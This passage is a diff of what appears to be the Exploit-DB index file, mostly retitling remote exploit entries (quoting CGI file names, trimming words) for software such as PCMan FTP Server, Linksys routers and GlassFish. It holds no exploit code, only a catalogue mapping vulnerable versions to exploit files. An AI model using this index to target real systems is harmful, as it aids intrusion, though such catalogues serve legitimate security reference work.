(SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)",2004-12-22,"Ivan Ivanovic",windows,remote,0 24944,platforms/windows/remote/24944.py,"Freefloat FTP Server 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0 -24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0 +24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - 'apply.cgi' Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0 24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0 24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0 @@ -13706,7 +13708,7 @@ id,file,description,date,author,platform,type,port 24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0 24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",multiple,remote,50000 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 -24974,platforms/hardware/remote/24974.rb,"NETGEAR DGN2200B - pppoe.cgi Remote Command Execution (Metasploit)",2013-04-22,Metasploit,hardware,remote,0 +24974,platforms/hardware/remote/24974.rb,"NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,hardware,remote,0 24976,platforms/multiple/remote/24976.rb,"Java Applet - Reflection Type Confusion Remote Code Execution (Metasploit)",2013-04-23,Metasploit,multiple,remote,0 24979,platforms/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",multiple,remote,0 24980,platforms/multiple/remote/24980.txt,"Yanf 0.4 - HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 @@ -13716,7 +13718,7 @@ id,file,description,date,author,platform,type,port 24984,platforms/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion - Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24985,platforms/php/remote/24985.txt,"PHP 4/5 - 'addslashes()' Null Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 24995,platforms/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",multiple,remote,0 -24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet - Remote Unauthenticated Payload Execution (Metasploit)",2013-04-25,"Andras Kabai",windows,remote,0 +24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet - Unauthenticated Remote Payload Execution (Metasploit)",2013-04-25,"Andras Kabai",windows,remote,0 25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal",2005-03-03,"Kristof Philipsen",windows,remote,0 25188,platforms/windows/remote/25188.txt,"Opera 7.x/Firefox 1.0/Internet Explorer 6.0 - Information Disclosure",2005-02-19,upken,windows,remote,0 25190,platforms/multiple/remote/25190.txt,"ca3de - Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 @@ -13725,7 +13727,7 @@ id,file,description,date,author,platform,type,port 29277,platforms/windows/remote/29277.txt,"Winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 24999,platforms/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,windows,remote,0 -25001,platforms/linux/remote/25001.rb,"GroundWork - monarch_scan.cgi OS Command Injection (Metasploit)",2013-04-25,Metasploit,linux,remote,0 +25001,platforms/linux/remote/25001.rb,"GroundWork - 'monarch_scan.cgi' OS Command Injection (Metasploit)",2013-04-25,Metasploit,linux,remote,0 25005,platforms/linux/remote/25005.txt,"NASM 0.98.x - Error Preprocessor Directive Buffer Overflow",2004-12-15,"Jonathan Rockway",linux,remote,0 25006,platforms/linux/remote/25006.txt,"RTF2LATEX2E 1.0 - Stack Buffer Overflow",2004-12-16,"Limin Wang",linux,remote,0 25008,platforms/linux/remote/25008.txt,"LinPopUp 1.2 - Remote Buffer Overflow",2004-12-15,"Stephen Dranger",linux,remote,0 @@ -13832,7 +13834,7 @@ id,file,description,date,author,platform,type,port 25597,platforms/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 - ActiveX Control SRC Information Disclosure",2005-05-04,"Robert Fly",windows,remote,0 25598,platforms/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0 25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote,0 -25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 +25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0 25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0 @@ -13875,7 +13877,7 @@ id,file,description,date,author,platform,type,port 26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution",2005-09-20,"eter Zelezny",linux,remote,0 25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution",2005-07-06,shalom@venera.com,windows,remote,0 25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x - Spoofed SIP Status Message Handling",2005-07-06,DrFrancky,hardware,remote,0 -25933,platforms/windows/remote/25933.txt,"WhitSoft SlimServe httpd 1.0/1.1 - Directory Traversal",2001-03-04,se00020,windows,remote,0 +25933,platforms/windows/remote/25933.txt,"WhitSoft SlimServe HTTPd 1.0/1.1 - Directory Traversal",2001-03-04,se00020,windows,remote,0 25944,platforms/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 - Mail Template Automatic Script Execution",2005-07-06,shalom@venera.com,multiple,remote,0 25966,platforms/hardware/remote/25966.txt,"Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution",2005-07-12,"Kevin Finisterre",hardware,remote,0 25970,platforms/linux/remote/25970.py,"Exim - 'sender_address' Remote Code Execution",2013-06-05,eKKiM,linux,remote,0 @@ -13945,7 +13947,7 @@ id,file,description,date,author,platform,type,port 26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0 26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote,0 40386,platforms/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",hardware,remote,161 -26737,platforms/lin_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,lin_x86,remote,0 +26737,platforms/lin_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force",2013-07-11,kingcope,lin_x86,remote,0 26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80 26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",linux,remote,0 26768,platforms/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,cgi,remote,0 @@ -13977,7 +13979,7 @@ id,file,description,date,author,platform,type,port 27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 - 'adapter-index.dsp?url' Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,linux,remote,0 27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0 -27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 +27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - 'command.php' Unauthenticated Remote Command Execution (Metasploit)",2013-08-12,Metasploit,hardware,remote,0 27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure - 'test_li_connection.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - 'ldapsyncnow.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 @@ -14018,8 +14020,8 @@ id,file,description,date,author,platform,type,port 27630,platforms/linux/remote/27630.txt,"Plone 2.x - MembershipTool Access Control Bypass",2006-04-12,MJ0011,linux,remote,0 27636,platforms/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions - 'ads-readerext?actionID' Cross-Site Scripting",2006-04-13,"Tan Chew Keong",multiple,remote,0 27637,platforms/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions - 'AlterCast?op' Cross-Site Scripting",2006-04-13,"Tan Chew Keong",multiple,remote,0 -28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption",2013-09-03,kingcope,hardware,remote,0 -27703,platforms/windows/remote/27703.py,"PCMan FTP Server 2.07 - 'STOR' Command Buffer Overflow",2013-08-19,Polunchis,windows,remote,0 +28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Unauthenticated Remote Heap Corruption",2013-09-03,kingcope,hardware,remote,0 +27703,platforms/windows/remote/27703.py,"PCMan FTP Server 2.07 - 'STOR' Buffer Overflow",2013-08-19,Polunchis,windows,remote,0 27704,platforms/windows/remote/27704.rb,"Cogent DataHub - HTTP Server Buffer Overflow (Metasploit)",2013-08-19,Metasploit,windows,remote,0 27705,platforms/multiple/remote/27705.rb,"Java - 'storeImageArray()' Invalid Array Indexing (Metasploit)",2013-08-19,Metasploit,multiple,remote,0 27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0 @@ -14063,7 +14065,7 @@ id,file,description,date,author,platform,type,port 27987,platforms/linux/remote/27987.html,"Mozilla Firefox 1.x - JavaScript Key Filtering",2006-06-06,"Jesse Ruderman",linux,remote,0 28005,platforms/windows/remote/28005.pl,"Microsoft Exchange Server 2000/2003 - Outlook Web Access Script Injection",2006-06-13,"Daniel Fabian",windows,remote,0 28007,platforms/windows/remote/28007.txt,"WinSCP 3.8.1 - URI Handler Arbitrary File Access",2006-06-12,"Jelmer Kuperus",windows,remote,0 -28030,platforms/unix/remote/28030.txt,"Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting",2006-06-15,"Thomas Liam Romanis",unix,remote,0 +28030,platforms/unix/remote/28030.txt,"Cisco Secure ACS 2.3 - 'LoginProxy.cgi' Cross-Site Scripting",2006-06-15,"Thomas Liam Romanis",unix,remote,0 28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / Apple Mac OSX 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) (Metasploit)",2013-09-04,Metasploit,windows,remote,0 28083,platforms/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution (Metasploit)",2013-09-04,Metasploit,windows,remote,0 @@ -14088,7 +14090,7 @@ id,file,description,date,author,platform,type,port 28298,platforms/windows/remote/28298.txt,"Yahoo! Messenger 7.0/7.5 - Remote Search String Arbitrary Browser Navigation",2006-07-28,"Ivan Ivan",windows,remote,0 28312,platforms/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote,0 28314,platforms/linux/remote/28314.c,"BomberClone 0.11 - Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 -28328,platforms/windows/remote/28328.rb,"PCMan FTP Server 2.07 - 'STOR' Command Stack Overflow (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21 +28328,platforms/windows/remote/28328.rb,"PCMan FTP Server 2.07 - 'STOR' Stack Overflow (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21 28331,platforms/windows/remote/28331.txt,"Oracle Java - 'ShortComponentRaster.verify()' Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0 28333,platforms/unix/remote/28333.rb,"D-Link Devices - UPnP SOAP TelnetD Command Execution (Metasploit)",2013-09-17,Metasploit,unix,remote,49152 28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance - 'sblistpack' Arbitrary Command Execution (Metasploit)",2013-09-17,Metasploit,linux,remote,443 @@ -14220,7 +14222,7 @@ id,file,description,date,author,platform,type,port 29595,platforms/linux/remote/29595.txt,"PHP RRD Browser 0.2 - 'P' Directory Traversal",2007-02-12,"Sebastian Wolfgarten",linux,remote,0 29614,platforms/osx/remote/29614.xml,"Parallels - Drag and Drop Hidden Share",2007-02-16,"Rich Mogull",osx,remote,0 29619,platforms/windows/remote/29619.html,"Microsoft Internet Explorer 6 - Local File Access",2007-02-20,"Rajesh Sethumadhavan",windows,remote,0 -29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI - close_window.cgi Buffer Overflow (Metasploit)",2013-11-18,Metasploit,hardware,remote,80 +29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI - 'close_window.cgi' Buffer Overflow (Metasploit)",2013-11-18,Metasploit,hardware,remote,80 29688,platforms/windows/remote/29688.txt,"EmbeddedWB Web Browser ActiveX Control - Remote Code Execution",2007-02-28,shinnai,windows,remote,0 29689,platforms/linux/remote/29689.py,"GnuPG 1.x - Signed Message Arbitrary Content Injection",2007-03-05,"Gerardo Richarte",linux,remote,0 29690,platforms/linux/remote/29690.py,"KMail 1.x - GnuPG Arbitrary Content Injection",2007-03-05,"Gerardo Richarte",linux,remote,0 @@ -14293,7 +14295,7 @@ id,file,description,date,author,platform,type,port 30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 - Filename Parse Error Information Disclosure",2007-06-25,"Shay Priel",multiple,remote,0 30231,platforms/multiple/remote/30231.txt,"Key Focus Web Server 3.1 - Index.WKF Cross-Site Scripting",2007-06-25,"Shay Priel",multiple,remote,0 30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow",2007-07-09,"Daniel Soeder",linux,remote,0 -30254,platforms/hardware/remote/30254.txt,"Linksys WAG54GS 1.0.6 (Wireless-G ADSL Gateway) - setup.cgi Cross-Site Scripting Vulnerabilities",2007-06-27,"Petko Petkov",hardware,remote,0 +30254,platforms/hardware/remote/30254.txt,"Linksys WAG54GS 1.0.6 (Wireless-G ADSL Gateway) - 'setup.cgi' Cross-Site Scripting",2007-06-27,"Petko Petkov",hardware,remote,0 30256,platforms/multiple/remote/30256.txt,"Oracle Rapid Install Web Server - Secondary Login Page Cross-Site Scripting",2007-06-28,"Kaushal Desai",multiple,remote,0 30257,platforms/windows/remote/30257.html,"HP Instant Support - ActiveX Control Driver Check Buffer Overflow",2007-04-01,"John Heasman",windows,remote,0 30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView 4.50.8 - DBASCIIAccess Remote Command Execution",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0 @@ -14434,7 +14436,7 @@ id,file,description,date,author,platform,type,port 31106,platforms/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - Buffer Overflow / Authentication Bypass",2008-02-04,"Luigi Auriemma",multiple,remote,0 31113,platforms/windows/remote/31113.html,"GlobalLink 2.6.1.2 - 'HanGamePlugincn18.dll' ActiveX Control Multiple Buffer Overflow Vulnerabilities",2008-02-05,anonymous,windows,remote,0 31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 - File Converter Field Length Remote Code Execution",2008-02-06,"Luigi Auriemma",windows,remote,0 -31119,platforms/multiple/remote/31119.txt,"TinTin++ / WinTin++ 1.97.9 - '#chat' Command Multiple Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote,0 +31119,platforms/multiple/remote/31119.txt,"TinTin++ / WinTin++ 1.97.9 - '#chat' Multiple Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote,0 31127,platforms/linux/remote/31127.txt,"Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure",2008-02-08,"Ronald van den Heetkamp",linux,remote,0 31130,platforms/multiple/remote/31130.txt,"Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure",2008-02-09,"John Kew",multiple,remote,0 31132,platforms/hardware/remote/31132.txt,"Group Logic ExtremeZ-IP File and Print Servers 5.1.2 x15 - Multiple Vulnerabilities",2008-02-10,"Luigi Auriemma",hardware,remote,0 @@ -14448,8 +14450,8 @@ id,file,description,date,author,platform,type,port 31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0 31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80 -31254,platforms/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 -31255,platforms/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 +31254,platforms/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 +31255,platforms/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 31462,platforms/linux/remote/31462.c,"Xine-Lib 1.1.11 - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0 31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow (SEH)",2014-01-29,"Dario Estrada",windows,remote,53 31264,platforms/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,php,remote,80 @@ -14502,7 +14504,7 @@ id,file,description,date,author,platform,type,port 31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",windows,remote,0 31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,php,remote,0 31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",unix,remote,0 -31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 +31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,windows,remote,0 31756,platforms/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0 31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0 @@ -14513,7 +14515,7 @@ id,file,description,date,author,platform,type,port 31770,platforms/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",multiple,remote,0 31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution",2014-02-20,"Julien Ahrens",windows,remote,0 31789,platforms/windows/remote/31789.py,"PCMan FTP Server 2.07 - Buffer Overflow",2014-02-20,Sumit,windows,remote,21 -31814,platforms/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit",2014-02-22,"OJ Reeves",windows,remote,0 +31814,platforms/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Stack Buffer Overflow",2014-02-22,"OJ Reeves",windows,remote,0 31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0 31828,platforms/hardware/remote/31828.txt,"Barracuda Spam Firewall 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",hardware,remote,0 31831,platforms/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",windows,remote,30000 @@ -14525,14 +14527,14 @@ id,file,description,date,author,platform,type,port 31875,platforms/linux/remote/31875.py,"Python - 'socket.recvfrom_into()' Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0 31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php?css_exceptions' Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php?sql_matchscope' Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 -31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal",2008-06-06,"Tan Chew Keong",linux,remote,0 +31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Directory Traversal",2008-06-06,"Tan Chew Keong",linux,remote,0 31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",multiple,remote,0 31901,platforms/multiple/remote/31901.txt,"Sun GlassFish 2.1 - 'name' Cross-Site Scripting",2008-06-10,"Eduardo Neves",multiple,remote,0 31903,platforms/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-by-One Buffer Overflow",2008-06-21,"Philipp Thomas",linux,remote,0 31909,platforms/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution",2008-06-13,securfrog,windows,remote,0 31912,platforms/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",multiple,remote,0 31918,platforms/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",multiple,remote,0 -31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal",2008-06-13,"Tan Chew Keong",multiple,remote,0 +31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Directory Traversal",2008-06-13,"Tan Chew Keong",multiple,remote,0 31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",multiple,remote,0 31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server - '/resourceNode/customResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server - '/resourceNode/externalResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 @@ -14541,15 +14543,15 @@ id,file,description,date,author,platform,type,port 31926,platforms/multiple/remote/31926.txt,"GlassFish Application Server - '/resourceNode/jdbcResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 31927,platforms/multiple/remote/31927.txt,"GlassFish Application Server - '/Applications/lifecycleModulesNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 31928,platforms/multiple/remote/31928.txt,"GlassFish Application Server - '/resourceNode/jdbcConnectionPoolNew1.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",multiple,remote,0 -31936,platforms/multiple/remote/31936.txt,"UltraEdit 14.00b - FTP/SFTP 'LIST' Command Directory Traversal",2008-06-17,"Tan Chew Keong",multiple,remote,0 -31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 -31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 +31936,platforms/multiple/remote/31936.txt,"UltraEdit 14.00b - FTP/SFTP 'LIST' Directory Traversal",2008-06-17,"Tan Chew Keong",multiple,remote,0 +31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 +31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 32048,platforms/osx/remote/32048.html,"Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 32133,platforms/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption functions Buffer Overflow",2008-07-31,"Chris Evans",linux,remote,0 31980,platforms/windows/remote/31980.html,"UUSee 2008 - UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download",2008-06-26,Symantec,windows,remote,0 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY - 'gefebt.exe' Remote Code Execution (Metasploit)",2014-02-28,Metasploit,windows,remote,80 31996,platforms/windows/remote/31996.txt,"Microsoft Internet Explorer 7/8 Beta 1 - Frame Location Cross Domain Security Bypass",2008-06-27,"Eduardo Vela",windows,remote,0 -31997,platforms/windows/remote/31997.txt,"AceFTP 3.80.3 - 'LIST' Command Directory Traversal",2008-06-27,"Tan Chew Keong",windows,remote,0 +31997,platforms/windows/remote/31997.txt,"AceFTP 3.80.3 - 'LIST' Directory Traversal",2008-06-27,"Tan Chew Keong",windows,remote,0 32012,platforms/linux/remote/32012.txt,"Netrw 125 Vim Script - Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",linux,remote,0 32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0 32049,platforms/windows/remote/32049.txt,"Microsoft Internet Explorer 6 - New ActiveX Object String Concatenation Memory Corruption",2008-07-14,0x000000,windows,remote,0 @@ -14594,7 +14596,7 @@ id,file,description,date,author,platform,type,port 32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation / Code Execution (Metasploit)",2014-03-22,Metasploit,hardware,remote,22 32442,platforms/windows/remote/32442.c,"Nokia PC Suite 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote,0 32445,platforms/linux/remote/32445.txt,"MySQL 5 - Command Line Client HTML Special Characters HTML Injection",2008-09-30,"Thomas Henlich",linux,remote,0 -32456,platforms/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Command Directory Traversal",2008-10-03,dmnt,windows,remote,0 +32456,platforms/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Directory Traversal",2008-10-03,dmnt,windows,remote,0 32457,platforms/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 - 'cds.php' SQL Injection",2008-10-03,"Jaykishan Nirmal",windows,remote,0 32458,platforms/multiple/remote/32458.txt,"OpenNMS 1.5.x - HTTP Response Splitting",2008-10-05,"BugSec LTD",multiple,remote,0 32460,platforms/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 - 